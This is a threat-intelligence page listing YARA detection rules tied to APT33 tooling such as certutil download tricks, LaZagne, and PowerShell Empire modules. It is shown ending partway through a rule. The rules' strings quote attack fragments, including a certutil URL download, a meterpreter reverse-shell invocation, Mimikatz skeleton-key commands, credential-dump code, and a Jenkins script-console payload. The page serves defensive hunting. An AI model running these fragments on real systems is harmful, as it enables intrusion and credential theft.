YARA rules for APT33
109 rules · scoped to actor · back to APT33
YARA rules whose family, name, or description matches this actor or its tooling. Use these for binary-pattern hunts.
rule Batch_Script_To_Run_PsExec {
meta:
author = "NCSC"
description = "Detects malicious batch file from NCSC report"
reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
date = "2018/04/06"
hash = "b7d7c4bc8f9fd0e461425747122a431f93062358ed36ce281147998575ee1a18"
id = "1fbeeec8-a5bd-569e-b435-c7d82d32e47b"
strings:
$ = "Tokens=1 delims=" ascii
$ = "SET ws=%1" ascii
$ = "Checking %ws%" ascii
$ = "%TEMP%\\%ws%ns.txt" ascii
$ = "ps.exe -accepteula" ascii
condition:
3 of them
}
rule Casper_SystemInformation_Output {
meta:
description = "Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://goo.gl/VRJNLo"
date = "2015/03/06"
score = 70
id = "aaae200c-7ef1-52eb-be5b-36e0ad29ecef"
strings:
$a0 = "***** SYSTEM INFORMATION ******"
$a1 = "***** SECURITY INFORMATION ******"
$a2 = "Antivirus: "
$a3 = "Firewall: "
$a4 = "***** EXECUTION CONTEXT ******"
$a5 = "Identity: "
$a6 = "<CONFIG TIMESTAMP="
condition:
all of them
}
rule Certutil_Decode_OR_Download {
meta:
description = "Certutil Decode"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Internal Research"
score = 40
date = "2017-08-29"
modified = "2026-04-01"
id = "63bdefd2-225a-56d5-b615-5e236c97f050"
strings:
$a1 = "certutil -decode " ascii wide
$a2 = "certutil -decode " ascii wide
$a3 = "certutil.exe -decode " ascii wide
$a4 = "certutil.exe -decode " ascii wide
$a5 = "certutil -urlcache -split -f http" ascii wide
$a6 = "certutil.exe -urlcache -split -f http" ascii wide
$fp_msi = { 52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00 72 00 79 }
$fp_doc = "https://docs.aws.amazon.com" ascii
condition:
filesize < 700KB
and 1 of ($a*)
and not 1 of ($fp*)
}
rule APT_Cloaked_CERTUTIL {
meta:
description = "Detects a renamed certutil.exe utility that is often used to decode encoded payloads"
author = "Florian Roth (Nextron Systems)"
reference = "Internal Research"
date = "2018-09-14"
modified = "2022-06-27"
id = "13943cda-6bb1-5c6c-8e55-e8d4bba1ffef"
strings:
$s1 = "-------- CERT_CHAIN_CONTEXT --------" fullword ascii
$s5 = "certutil.pdb" fullword ascii
$s3 = "Password Token" fullword ascii
condition:
uint16(0) == 0x5a4d and all of them
and not filename contains "certutil"
and not filename contains "CertUtil"
and not filename contains "Certutil"
and not filepath contains "\\Bromium\\"
}
rule Binary_Drop_Certutil {
meta:
description = "Drop binary as base64 encoded cert trick"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/9DNn8q"
date = "2015-07-15"
score = 70
id = "19791e51-d041-524d-80fa-9f3ec54eb084"
strings:
$s0 = "echo -----BEGIN CERTIFICATE----- >" ascii
$s1 = "echo -----END CERTIFICATE----- >>" ascii
$s2 = "certutil -decode " ascii
condition:
filesize < 10KB and all of them
}
rule Lazagne_PW_Dumper {
meta:
description = "Detects Lazagne PW Dumper"
author = "Markus Neis / Florian Roth"
reference = "https://github.com/AlessandroZ/LaZagne/releases/"
date = "2018-03-22"
score = 70
id = "1904029e-9336-5278-ae2e-4bc853316600"
strings:
$s1 = "Crypto.Hash" fullword ascii
$s2 = "laZagne" fullword ascii
$s3 = "impacket.winregistry" fullword ascii
condition:
3 of them
}
rule HKTL_Lazagne_PasswordDumper_Dec18_1 {
meta:
description = "Detects password dumper Lazagne often used by middle eastern threat groups"
author = "Florian Roth (Nextron Systems)"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
reference = "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group"
date = "2018-12-11"
score = 85
hash1 = "1205f5845035e3ee30f5a1ced5500d8345246ef4900bcb4ba67ef72c0f79966c"
hash2 = "884e991d2066163e02472ea82d89b64e252537b28c58ad57d9d648b969de6a63"
hash3 = "bf8f30031769aa880cdbe22bc0be32691d9f7913af75a5b68f8426d4f0c7be50"
id = "bae48a4d-33b6-55b9-abf5-daf87e5da9e9"
strings:
$s1 = "softwares.opera(" ascii
$s2 = "softwares.mozilla(" ascii
$s3 = "config.dico(" ascii
$s4 = "softwares.chrome(" ascii
$s5 = "softwares.outlook(" ascii
condition:
uint16(0) == 0x5a4d and filesize < 17000KB and 1 of them
}
rule HKTL_Lazagne_Gen_18 {
meta:
description = "Detects Lazagne password extractor hacktool"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/AlessandroZ/LaZagne"
license = "https://creativecommons.org/licenses/by-nc/4.0/"
date = "2018-12-11"
score = 80
hash1 = "51121dd5fbdfe8db7d3a5311e3e9c904d644ff7221b60284c03347938577eecf"
id = "034ea6d8-f5cf-5664-9ff9-24d19403093d"
strings:
$x1 = "lazagne.config.powershell_execute(" ascii
$x2 = "creddump7.win32." ascii
$x3 = "lazagne.softwares.windows.hashdump" ascii
$x4 = ".softwares.memory.libkeepass.common(" ascii
condition:
2 of them
}
rule Empire_Invoke_BypassUAC {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-BypassUAC.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "ab0f900a6915b7497313977871a64c3658f3e6f73f11b03d2d33ca61305dc6a8"
id = "8454d929-e184-5be1-b61f-4dfa8f44bdda"
strings:
$s1 = "$WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory" fullword ascii
$s2 = "$proc = Start-Process -WindowStyle Hidden notepad.exe -PassThru" fullword ascii
$s3 = "$Payload = Invoke-PatchDll -DllBytes $Payload -FindString \"ExitThread\" -ReplaceString \"ExitProcess\"" fullword ascii
$s4 = "$temp = [System.Text.Encoding]::UNICODE.GetBytes($szTempDllPath)" fullword ascii
condition:
filesize < 1200KB and 3 of them
}
rule Empire_lib_modules_trollsploit_message {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file message.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "71f2258177eb16eafabb110a9333faab30edacf67cb019d5eab3c12d095655d5"
id = "cb0eee5a-c236-512e-8256-7411a7fb1fd5"
strings:
$s1 = "script += \" -\" + str(option) + \" \\\"\" + str(values['Value'].strip(\"\\\"\")) + \"\\\"\"" fullword ascii
$s2 = "if option.lower() != \"agent\" and option.lower() != \"computername\":" fullword ascii
$s3 = "[String] $Title = 'ERROR - 0xA801B720'" fullword ascii
$s4 = "'Value' : 'Lost contact with the Domain Controller.'" fullword ascii
condition:
filesize < 10KB and 3 of them
}
rule Empire_Persistence {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file Persistence.psm1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "ae8875f7fcb8b4de5cf9721a9f5a9f7782f7c436c86422060ecdc5181e31092f"
id = "0f63b5f4-f933-5821-b0b0-50717e75f6d9"
strings:
$s1 = "C:\\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -V" ascii
$s2 = "# Execute the following to remove the user-level persistent payload" fullword ascii
$s3 = "$PersistantScript = $PersistantScript.ToString().Replace('EXECUTEFUNCTION', \"$PersistenceScriptName -Persist\")" fullword ascii
condition:
filesize < 108KB and 1 of them
}
rule Empire_portscan {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file portscan.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "b355efa1e7b3681b1402e22c58ce968795ef245fd08a0afb948d45c173e60b97"
id = "23a0f769-9155-5aa0-9200-2baf827bdda4"
strings:
$s1 = "script += \"Invoke-PortScan -noProgressMeter -f\"" fullword ascii
$s2 = "script += \" | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-Str" ascii
condition:
filesize < 14KB and all of them
}
rule Empire_Invoke_Shellcode {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438"
id = "41788f71-cc99-50b3-bdc7-17b132ab2767"
strings:
$s1 = "C:\\PS> Invoke-Shellcode -ProcessId $Proc.Id -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 443 -Verbos" ascii
$s2 = "\"Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!\" ) )" fullword ascii
$s3 = "$RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)" fullword ascii
condition:
filesize < 100KB and 1 of them
}
rule Empire_Write_HijackDll {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file Write-HijackDll.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "155fa7168e28f15bb34f67344f47234a866e2c63b3303422ff977540623c70bf"
id = "6a80af21-fb01-5996-b14d-44ff55b7fb3e"
strings:
$s1 = "$DllBytes = Invoke-PatchDll -DllBytes $DllBytes -FindString \"debug.bat\" -ReplaceString $BatchPath" fullword ascii
$s2 = "$DllBytes32 = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBw" ascii
$s3 = "[Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes32)" fullword ascii
condition:
filesize < 500KB and 2 of them
}
rule Empire_skeleton_key {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file skeleton_key.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "3d02f16dcc38faaf5e97e4c5dbddf761f2816004775e6af8826cde9e29bb750f"
id = "d508e09e-13e8-5866-bb5b-0d886f960bb5"
strings:
$s1 = "script += \"Invoke-Mimikatz -Command '\\\"\" + command + \"\\\"';\"" fullword ascii
$s2 = "script += '\"Skeleton key implanted. Use password \\'mimikatz\\' for access.\"'" fullword ascii
$s3 = "command = \"misc::skeleton\"" fullword ascii
$s4 = "\"ONLY APPLICABLE ON DOMAIN CONTROLLERS!\")," fullword ascii
condition:
filesize < 6KB and 2 of them
}
rule Empire_invoke_wmi {
meta:
description = "Empire - a pure PowerShell post-exploitation agent - file invoke_wmi.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/PowerShellEmpire/Empire"
date = "2015-08-06"
score = 70
hash = "a914cb227f652734a91d3d39745ceeacaef7a8b5e89c1beedfd6d5f9b4615a1d"
id = "1e1d1e71-6ea9-500a-b8b8-c48a64bc2b54"
strings:
$s1 = "(credID, credType, domainName, userName, password, host, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]" fullword ascii
$s2 = "script += \";'Invoke-Wmi executed on \" +computerNames +\"'\"" fullword ascii
$s3 = "script = \"$PSPassword = \\\"\"+password+\"\\\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Man" ascii
condition:
filesize < 20KB and 2 of them
}
rule Empire_Invoke_MetasploitPayload {
meta:
description = "Detects Empire component - file Invoke-MetasploitPayload.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "a85ca27537ebeb79601b885b35ddff6431860b5852c6a664d32a321782808c54"
id = "608c30b0-826a-55b1-afb8-756b476d6b55"
strings:
$s1 = "$ProcessInfo.Arguments=\"-nop -c $DownloadCradle\"" fullword ascii
$s2 = "$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 9KB and 1 of them ) or all of them
}
rule Empire_Exploit_Jenkins {
meta:
description = "Detects Empire component - file Exploit-Jenkins.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "a5182cccd82bb9984b804b365e07baba78344108f225b94bd12a59081f680729"
id = "f2162783-34cd-5db4-bd1c-6c58feb92e77"
strings:
$s1 = "$postdata=\"script=println+new+ProcessBuilder%28%27\"+$($Cmd)+\"" ascii
$s2 = "$url = \"http://\"+$($Rhost)+\":\"+$($Port)+\"/script\"" fullword ascii
$s3 = "$Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)" fullword ascii
condition:
( uint16(0) == 0x6620 and filesize < 7KB and 1 of them ) or all of them
}
rule Empire_Get_SecurityPackages {
meta:
description = "Detects Empire component - file Get-SecurityPackages.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "5d06e99121cff9b0fce74b71a137501452eebbcd1e901b26bde858313ee5a9c1"
id = "a109eda1-a26d-5cf6-b6b5-1a1a1e770a0a"
strings:
$s1 = "$null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)" fullword ascii
$s2 = "$EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 20KB and 1 of them ) or all of them
}
rule Empire_Invoke_PowerDump {
meta:
description = "Detects Empire component - file Invoke-PowerDump.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "095c5cf5c0c8a9f9b1083302e2ba1d4e112a410e186670f9b089081113f5e0e1"
id = "d1082a4e-d458-57fb-b332-7c775c8ef2dd"
strings:
$x16 = "$enc = Get-PostHashdumpScript" fullword ascii
$x19 = "$lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;" fullword ascii
$x20 = "$rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);" fullword ascii
condition:
( uint16(0) == 0x2023 and filesize < 60KB and 1 of them ) or all of them
}
rule Empire_Install_SSP {
meta:
description = "Detects Empire component - file Install-SSP.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "7fd921a23950334257dda57b99e03c1e1594d736aab2dbfe9583f99cd9b1d165"
id = "06bbdcc5-c48b-5753-88a2-5c962d1b986f"
strings:
$s1 = "Install-SSP -Path .\\mimilib.dll" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 20KB and 1 of them ) or all of them
}
rule Empire_Invoke_ShellcodeMSIL {
meta:
description = "Detects Empire component - file Invoke-ShellcodeMSIL.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "9a9c6c9eb67bde4a8ce2c0858e353e19627b17ee2a7215fa04a19010d3ef153f"
id = "06011b51-bad7-5656-ac37-e49f9b6d0498"
strings:
$s1 = "$FinalShellcode.Length" fullword ascii
$s2 = "@(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)" fullword ascii
$s3 = "@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57," fullword ascii
$s4 = "$TargetMethod.Invoke($null, @(0x11112222)) | Out-Null" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
}
rule HKTL_Empire_PowerUp {
meta:
description = "Detects Empire component - file PowerUp.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c"
id = "e79d093e-7481-52a3-a350-4d1b6d8955cd"
strings:
$x2 = "$PoolPasswordCmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool" fullword ascii
condition:
( uint16(0) == 0x233c and filesize < 2000KB and 1 of them ) or all of them
}
rule Empire_Get_GPPPassword {
meta:
description = "Detects Empire component - file Get-GPPPassword.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "55a4519c4f243148a971e4860225532a7ce730b3045bde3928303983ebcc38b0"
id = "7791b009-19d3-5d08-8ef7-4723d28830ed"
strings:
$s1 = "$Base64Decoded = [Convert]::FromBase64String($Cpassword)" fullword ascii
$s2 = "$XMlFiles += Get-ChildItem -Path \"\\\\$DomainController\\SYSVOL\" -Recurse" ascii
$s3 = "function Get-DecryptedCpassword {" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
}
rule Empire_Invoke_SmbScanner {
meta:
description = "Detects Empire component - file Invoke-SmbScanner.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "9a705f30766279d1e91273cfb1ce7156699177a109908e9a986cc2d38a7ab1dd"
id = "63cd048b-04fd-5b4f-9d4d-3a001c31b4df"
strings:
$s1 = "$up = Test-Connection -count 1 -Quiet -ComputerName $Computer " fullword ascii
$s2 = "$out | add-member Noteproperty 'Password' $Password" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
}
rule Empire_Exploit_JBoss {
meta:
description = "Detects Empire component - file Exploit-JBoss.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "9ea3e00b299e644551d90bbee0ce3e4e82445aa15dab7adb7fcc0b7f1fe4e653"
id = "a9c75cf5-9469-5a45-b750-69728ed0069f"
strings:
$s1 = "Exploit-JBoss" fullword ascii
$s2 = "$URL = \"http$($SSL)://\" + $($Rhost) + ':' + $($Port)" ascii
$s3 = "\"/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service" ascii
$s4 = "http://blog.rvrsh3ll.net" fullword ascii
$s5 = "Remote URL to your own WARFile to deploy." fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
}
rule Empire_dumpCredStore {
meta:
description = "Detects Empire component - file dumpCredStore.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "c1e91a5f9cc23f3626326dab2dcdf4904e6f8a332e2bce8b9a0854b371c2b350"
id = "cdb87ed4-fa90-5724-b37d-97cf8e4b8326"
strings:
$x1 = "[DllImport(\"Advapi32.dll\", SetLastError = true, EntryPoint = \"CredReadW\"" ascii
$s12 = "[String] $Msg = \"Failed to enumerate credentials store for user '$Env:UserName'\"" fullword ascii
$s15 = "Rtn = CredRead(\"Target\", CRED_TYPE.GENERIC, out Cred);" fullword ascii
condition:
( uint16(0) == 0x233c and filesize < 40KB and 1 of them ) or all of them
}
rule Empire_Invoke_EgressCheck {
meta:
description = "Detects Empire component - file Invoke-EgressCheck.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "e2d270266abe03cfdac66e6fc0598c715e48d6d335adf09a9ed2626445636534"
id = "21e09250-6853-5743-a6ef-aa6be8091d33"
strings:
$s1 = "egress -ip $ip -port $c -delay $delay -protocol $protocol" fullword ascii
condition:
( uint16(0) == 0x233c and filesize < 10KB and 1 of them ) or all of them
}
rule Empire_ReflectivePick_x64_orig {
meta:
description = "Detects Empire component - file ReflectivePick_x64_orig.dll"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
modified = "2022-12-21"
hash1 = "a8c1b108a67e7fc09f81bd160c3bafb526caf3dbbaf008efb9a96f4151756ff2"
id = "cd69a149-d881-5f93-9647-84241bd96ba5"
strings:
$a1 = "\\PowerShellRunner.pdb" ascii
$a2 = "PowerShellRunner.dll" fullword wide
$s1 = "ReflectivePick" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 400KB and 1 of ($a*) and $s1
}
rule Empire_Out_Minidump {
meta:
description = "Detects Empire component - file Out-Minidump.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "7803ae7ba5d4e7d38e73745b3f321c2ca714f3141699d984322fa92e0ff037a1"
id = "8c53d2ab-afc5-5d7b-97e1-496425b9664f"
strings:
$s1 = "$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle," fullword ascii
$s2 = "$ProcessFileName = \"$($ProcessName)_$($ProcessId).dmp\"" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
}
rule Empire_Invoke_PostExfil {
meta:
description = "Detects Empire component - file Invoke-PostExfil.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "00c0479f83c3dbbeff42f4ab9b71ca5fe8cd5061cb37b7b6861c73c54fd96d3e"
id = "58d9e057-efde-56ab-9b7e-982342a910e2"
strings:
$s1 = "# upload to a specified exfil URI" fullword ascii
$s2 = "Server path to exfil to." fullword ascii
condition:
( uint16(0) == 0x490a and filesize < 2KB and 1 of them ) or all of them
}
rule Empire_Invoke_SMBAutoBrute {
meta:
description = "Detects Empire component - file Invoke-SMBAutoBrute.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "7950f8abdd8ee09ed168137ef5380047d9d767a7172316070acc33b662f812b2"
id = "a6b402ac-0925-5bc6-9d6a-b2b811496f9e"
strings:
$s1 = "[*] PDC: LAB-2008-DC1.lab.com" fullword ascii
$s2 = "$attempts = Get-UserBadPwdCount $userid $dcs" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
}
rule Empire_Get_Keystrokes {
meta:
description = "Detects Empire component - file Get-Keystrokes.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "c36e71db39f6852f78df1fa3f67e8c8a188bf951e96500911e9907ee895bf8ad"
id = "7fb57a0d-6b65-5ee8-96ef-9af303f15007"
strings:
$s1 = "$RightMouse = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
}
rule Empire_Invoke_DllInjection {
meta:
description = "Detects Empire component - file Invoke-DllInjection.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "304031aa9eca5a83bdf1f654285d86df79cb3bba4aa8fe1eb680bd5b2878ebf0"
id = "6aa14e8f-9801-5cd3-beb0-955e19d25503"
strings:
$s1 = "-Dll evil.dll" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 40KB and 1 of them ) or all of them
}
rule Empire_KeePassConfig {
meta:
description = "Detects Empire component - file KeePassConfig.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "5a76e642357792bb4270114d7cd76ce45ba24b0d741f5c6b916aeebd45cff2b3"
id = "814a6ff9-a6ac-55e7-bb3f-597351ce421d"
strings:
$s1 = "$UserMasterKeyFiles = @(, $(Get-ChildItem -Path $UserMasterKeyFolder -Force | Select-Object -ExpandProperty FullName) )" fullword ascii
condition:
( uint16(0) == 0x7223 and filesize < 80KB and 1 of them ) or all of them
}
rule Empire_Invoke_SSHCommand {
meta:
description = "Detects Empire component - file Invoke-SSHCommand.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
hash1 = "cbaf086b14d5bb6a756cbda42943d4d7ef97f8277164ce1f7dd0a1843e9aa242"
id = "b06b507f-b6b8-5f4b-8d6d-920f141e9ac1"
strings:
$s1 = "$Base64 = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAA" ascii
$s2 = "Invoke-SSHCommand -ip 192.168.1.100 -Username root -Password test -Command \"id\"" fullword ascii
$s3 = "Write-Verbose \"[*] Error loading dll\"" fullword ascii
condition:
( uint16(0) == 0x660a and filesize < 2000KB and 1 of them ) or all of them
}
rule Empire_PowerShell_Framework_Gen1 {
meta:
description = "Detects Empire component"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
super_rule = 1
hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
hash2 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
hash3 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
hash4 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
hash5 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
id = "8fdb48a0-5d40-55be-ae23-e9c8c4c2ecea"
strings:
$s1 = "Write-BytesToMemory -Bytes $Shellcode" ascii
$s2 = "$GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
}
rule Empire_PowerUp_Gen {
meta:
description = "Detects Empire component - from files PowerUp.ps1, PowerUp.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
super_rule = 1
hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c"
id = "ae6b0462-7193-54a4-8fb9-befc1b461b15"
strings:
$s1 = "$Result = sc.exe config $($TargetService.Name) binPath= $OriginalPath" fullword ascii
$s2 = "$Result = sc.exe pause $($TargetService.Name)" fullword ascii
condition:
( uint16(0) == 0x233c and filesize < 2000KB and 1 of them ) or all of them
}
rule Empire_PowerShell_Framework_Gen2 {
meta:
description = "Detects Empire component"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
super_rule = 1
